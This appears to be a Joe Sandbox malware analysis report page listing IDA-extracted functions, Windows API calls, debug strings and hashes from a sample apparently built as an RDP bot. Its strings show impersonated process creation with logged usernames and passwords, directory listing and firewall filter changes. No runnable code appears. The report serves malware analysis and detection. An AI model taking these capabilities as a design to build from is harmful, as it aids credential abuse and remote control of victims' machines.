Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction ID: b09454893cffa80c5166c2b32afb758a243d9c7947afc551eeeb0d7fd3e166ea
Opcode Fuzzy Hash: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction Fuzzy Hash: 62F0891BB08703A1F966BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f60ff86bf2d525c290b10fdb5cd24a568a02267bd55b3a20e4c65a60655f2123
Instruction ID: 90414ec8a860d6560aa9817dc50bf85e0942721a4c71c4fd0f707513a288a978
Opcode Fuzzy Hash: f60ff86bf2d525c290b10fdb5cd24a568a02267bd55b3a20e4c65a60655f2123
Instruction Fuzzy Hash: 38F0891BB08703A1F967BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4B0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f60ff86bf2d525c290b10fdb5cd24a568a02267bd55b3a20e4c65a60655f2123
Instruction ID: 90414ec8a860d6560aa9817dc50bf85e0942721a4c71c4fd0f707513a288a978
Opcode Fuzzy Hash: f60ff86bf2d525c290b10fdb5cd24a568a02267bd55b3a20e4c65a60655f2123
Instruction Fuzzy Hash: 38F0891BB08703A1F967BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB497E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction ID: 07523cd7b246b06516d9fde137f5512024a059e274d7aefd57b876658a23df44
Opcode Fuzzy Hash: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction Fuzzy Hash: A4F0891BB08703A1F966BA05B5427B9D2612F917A2EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4992 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction ID: c6ec84a7d4d283298ee2505ac9a393300419101efec1e0678bff953c783e0e24
Opcode Fuzzy Hash: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction Fuzzy Hash: 74F0891BB08703A1F966BA05B5437B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4988 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction ID: c2adb0843ecf5f2e7aa9c09abe668fbf21adaeda694f2383d2b7a87097ce4279
Opcode Fuzzy Hash: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction Fuzzy Hash: 42F0891BB08703A1F966BA05B5427B9D2611F917A6EC946B58E5C0B7C1ED3DD883A320

Function 00007FF73AFB49A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction ID: b09454893cffa80c5166c2b32afb758a243d9c7947afc551eeeb0d7fd3e166ea
Opcode Fuzzy Hash: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction Fuzzy Hash: 62F0891BB08703A1F966BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction ID: bc301c86fa634eb69e62cedba2ebb7a80ff8b286bc8d778d070b1e5505b098cd
Opcode Fuzzy Hash: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction Fuzzy Hash: 3BF0891BB08703A1F966BA05B5427B9D2611F917A6EC945B5CE5C0B7C1DE3DE883A320

Non-executed Functions

Function 00007FF73AFB292E Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF73AFB29C0
strcat.MSVCRT ref: 00007FF73AFB2AFA
strlen.MSVCRT ref: 00007FF73AFB2B10
strlen.MSVCRT ref: 00007FF73AFB2B1B
strlen.MSVCRT ref: 00007FF73AFB2B4F
strcat.MSVCRT ref: 00007FF73AFB2B5F
strlen.MSVCRT ref: 00007FF73AFB2B9D
strlen.MSVCRT ref: 00007FF73AFB2BAA
strlen.MSVCRT ref: 00007FF73AFB2BD3
strcat.MSVCRT ref: 00007FF73AFB2BE5
LogonUserA.ADVAPI32 ref: 00007FF73AFB2C55
GetLastError.KERNEL32 ref: 00007FF73AFB2C63
CloseHandle.KERNEL32 ref: 00007FF73AFB2F27

Strings

(pi != NULL), xrefs: 00007FF73AFB2A62
(usr == NULL) || (pwd != NULL), xrefs: 00007FF73AFB2ACA
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB2A70, 00007FF73AFB2AA4, 00007FF73AFB2AD8
NULL, xrefs: 00007FF73AFB31B6, 00007FF73AFB31C2, 00007FF73AFB31CE, 00007FF73AFB31DA, 00007FF73AFB31E6, 00007FF73AFB31F2, 00007FF73AFB31FE, 00007FF73AFB320A, 00007FF73AFB3216
[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x), xrefs: 00007FF73AFB2A30
[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF73AFB2E23
[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu), xrefs: 00007FF73AFB2F10
process_create, xrefs: 00007FF73AFB2A29, 00007FF73AFB2A69, 00007FF73AFB2A9D, 00007FF73AFB2AD1, 00007FF73AFB2C83, 00007FF73AFB2E1C, 00007FF73AFB2F09, 00007FF73AFB2F78, 00007FF73AFB30AC, 00007FF73AFB319E
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF73AFB2A5B, 00007FF73AFB2A8F, 00007FF73AFB2AC3
(app != NULL), xrefs: 00007FF73AFB2A96
[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu), xrefs: 00007FF73AFB30B3
[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu), xrefs: 00007FF73AFB2F7F
h, xrefs: 00007FF73AFB30F6
[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF73AFB2C8A
[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu), xrefs: 00007FF73AFB31A5

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen$strcat$CloseErrorHandleLastLogonUser
String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
API String ID: 1842180197-3127737957
Opcode ID: b7188ef324f93030a506420794d0e2765d507f709723c8909072f9b7107facfe
Instruction ID: 80fabab6df1945c4469f3a0e69b31e859f9fc3d8e6198224212d579cd5ab3547
Opcode Fuzzy Hash: b7188ef324f93030a506420794d0e2765d507f709723c8909072f9b7107facfe
Instruction Fuzzy Hash: C11280A9A0C743A1F638BB02E4423B9E2A0FF44784FC40572D98E476A4DF7CE545B761

Function 00007FF73AFB3DB3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FF73AFB3DF9
strcpy.MSVCRT ref: 00007FF73AFB3E14
FindFirstFileA.KERNEL32 ref: 00007FF73AFB3EE7
GetLastError.KERNEL32 ref: 00007FF73AFB3F03
GetLastError.KERNEL32 ref: 00007FF73AFB3F32
FindClose.KERNEL32 ref: 00007FF73AFB3F50

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB3E42, 00007FF73AFB3E7A, 00007FF73AFB3EB2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB3E57, 00007FF73AFB3E8F, 00007FF73AFB3EC7
fs_dir_list, xrefs: 00007FF73AFB3E50, 00007FF73AFB3E88, 00007FF73AFB3EC0, 00007FF73AFB3F1D, 00007FF73AFB3F61
(resume_handle != NULL), xrefs: 00007FF73AFB3EB9
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF73AFB3F24
(path != NULL), xrefs: 00007FF73AFB3E49
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF73AFB3F68
(name != NULL), xrefs: 00007FF73AFB3E81

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: cdc34806d60c431622bd7d249ddf61cd36df4f0909a0aa9c4113b06195233118
Instruction ID: 6d615b2ed00191d83d44627da92afb2a2e05491833f60712e8c8793d5c73c35f
Opcode Fuzzy Hash: cdc34806d60c431622bd7d249ddf61cd36df4f0909a0aa9c4113b06195233118
Instruction Fuzzy Hash: 33617029E4DB53B5FB247715A4463B8E270AF10394FD406B2E86E4B6D0DFACE844B361

Function 00007FF73AFB1A19 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF73AFB1A46
LoadResource.KERNEL32 ref: 00007FF73AFB1A5E

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

GetLastError.KERNEL32 ref: 00007FF73AFB1B58
GetLastError.KERNEL32 ref: 00007FF73AFB1B8D
GetLastError.KERNEL32 ref: 00007FF73AFB1B92

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB1B1F, 00007FF73AFB1B4A
C:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FF73AFB1B0A, 00007FF73AFB1B35
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FF73AFB1BA2
module_get_version, xrefs: 00007FF73AFB1ADF, 00007FF73AFB1B18, 00007FF73AFB1B43, 00007FF73AFB1B66, 00007FF73AFB1B9B
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF73AFB1B6D
(out != NULL), xrefs: 00007FF73AFB1B3C
[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FF73AFB1AE6
(hnd != NULL), xrefs: 00007FF73AFB1B11

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-2019010457
Opcode ID: a39caf197881b0647ecb2d086e68fb9eb16d6472d07efe5ce341554b0eb9672d
Instruction ID: c27cce0d29e4e5d7eaa7f952cccb6da3ea2126a6bc130b6cba68e3aae373c600
Opcode Fuzzy Hash: a39caf197881b0647ecb2d086e68fb9eb16d6472d07efe5ce341554b0eb9672d
Instruction Fuzzy Hash: 13417F7AA08243AAF764FF29E4415A9B7E0FB08754F800571EA5D837A4EF3CE544EB10

Function 00007FF73AFBFF1F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF73AFBFF2E
GetProcAddress.KERNEL32 ref: 00007FF73AFBFF45
LoadLibraryW.KERNEL32 ref: 00007FF73AFBFF53
GetProcAddress.KERNEL32 ref: 00007FF73AFBFF63

Strings

SystemFunction036, xrefs: 00007FF73AFBFF59
rand_s, xrefs: 00007FF73AFBFF3B
msvcrt.dll, xrefs: 00007FF73AFBFF27
advapi32.dll, xrefs: 00007FF73AFBFF4C

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction ID: be9921040f9d2b84dcfd57efb5b0f177e7fd78b665092f113b9d4773870da28f
Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction Fuzzy Hash: 17F0DA2CE4AA17B0FD45FB57FC420B4A364BF48791BC419B2C88D03724EE2CE15AA320

Function 00007FF73AFB929A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF73AFB92B1
ntohl.WS2_32 ref: 00007FF73AFB92B9

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

Strings

[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF73AFB9367
setup_ip4_filt, xrefs: 00007FF73AFB9360, 00007FF73AFB951A
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx), xrefs: 00007FF73AFB9521
3L, xrefs: 00007FF73AFB9486
TL, xrefs: 00007FF73AFB92D6

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fflushfwriteinet_addrntohl
